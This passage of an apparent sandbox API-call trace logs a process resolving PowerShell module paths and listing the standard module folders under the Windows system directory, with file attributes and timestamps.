(x86)\\windowspowershell\\modules\\powershellget\\powershellget.psm1")) returned 0xffffffff [0149.744] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.cdxml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.cdxml")) returned 0xffffffff [0149.744] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.xaml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.xaml")) returned 0xffffffff [0149.744] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.ni.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.ni.dll")) returned 0xffffffff [0149.744] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.dll")) returned 0xffffffff [0149.748] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules")) returned 0x10 [0149.749] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e580) returned 1 [0149.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x33 [0149.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x33, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0149.749] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\*"), lpFindFileData=0x5a0e330 | out: lpFindFileData=0x5a0e330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68e9a0 [0149.750] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.750] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0149.750] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0149.750] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0149.750] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496cfce0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496cfce0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496cfce0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0149.750] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0149.750] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="MICROS~1.HOS")) returned 1 [0149.750] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0149.750] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496cfce0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496cfce0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496cfce0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0149.750] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x498007e0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="MICROS~1.SEC")) returned 1 [0149.750] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0149.750] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x498007e0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0149.750] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x497da680, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x497da680, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="PSDESI~1")) returned 1 [0149.750] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8100bf6e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8100bf6e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="PSDIAG~1")) returned 1 [0149.751] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="PSSCHE~1")) returned 1 [0149.751] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0149.751] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0149.751] FindClose (in: hFindFile=0x68e9a0 | out: hFindFile=0x68e9a0) returned 1 [0149.751] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f0) returned 1 [0149.751] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e550) returned 1 [0149.751] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\modules.psd1")) returned 0xffffffff [0149.751] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\modules.psm1")) returned 0xffffffff [0149.752] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.cdxml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\modules.cdxml")) returned 0xffffffff [0149.752] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.xaml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\modules.xaml")) returned 0xffffffff [0149.752] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.ni.dll" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\modules.ni.dll")) returned 0xffffffff [0149.752] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.dll" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\modules.dll")) returned 0xffffffff [0149.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x40 [0149.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x40, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f [0149.752] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2d0) returned 1 [0149.752] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer"), fInfoLevelId=0x0, lpFileInformation=0x5a0e594 | out: lpFileInformation=0x5a0e594*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0149.753] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2cc) returned 1 [0149.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0149.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x3e, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", lpFilePart=0x0) returned 0x3d [0149.753] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2d0) returned 1 [0149.753] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\cimcmdlets"), fInfoLevelId=0x0, lpFileInformation=0x5a0e594 | out: lpFileInformation=0x5a0e594*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.753] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2cc) returned 1 [0149.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0149.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", nBufferLength=0x37, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36 [0149.754] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2d0) returned 1 [0149.754] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\ise"), fInfoLevelId=0x0, lpFileInformation=0x5a0e594 | out: lpFileInformation=0x5a0e594*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.754] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2cc) returned 1 [0149.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0149.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x50, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", lpFilePart=0x0) returned 0x4f [0149.754] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2d0) returned 1 [0149.754] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive"), fInfoLevelId=0x0, lpFileInformation=0x5a0e594 | out: lpFileInformation=0x5a0e594*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496cfce0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496cfce0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496cfce0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.755] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2cc) returned 1 [0149.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0149.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", lpFilePart=0x0) returned 0x53 [0149.755] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2d0) returned 1 [0149.755] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics"), fInfoLevelId=0x0, lpFileInformation=0x5a0e594 | out: lpFileInformation=0x5a0e594*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.755] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2cc) returned 1 [0149.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4d [0149.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x4d, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", lpFilePart=0x0) returned 0x4c [0149.755] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2d0) returned 1 [0149.756] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host"), fInfoLevelId=0x0, lpFileInformation=0x5a0e594 | out: lpFileInformation=0x5a0e594*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2cc) returned 1 [0149.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0149.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x53, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0149.756] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2d0) returned 1 [0149.756] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management"), fInfoLevelId=0x0, lpFileInformation=0x5a0e594 | out: lpFileInformation=0x5a0e594*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2cc) returned 1 [0149.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0149.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x53, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", lpFilePart=0x0) returned 0x52 [0149.757] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2d0) returned 1 [0149.757] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils"), fInfoLevelId=0x0, lpFileInformation=0x5a0e594 | out: lpFileInformation=0x5a0e594*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496cfce0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496cfce0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496cfce0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0149.757] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2cc) returned 1 [0149.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0149.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x51, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", lpFilePart=0x0) returned 0x50 [0149.757] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2d0) returned 1 [0149.757] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security"), fInfoLevelId=0x0, lpFileInformation=0x5a0e594 | out: lpFileInformation=0x5a0e594*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x498007e0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2cc) returned 1 [0149.758] GetFullPathNameW (in: 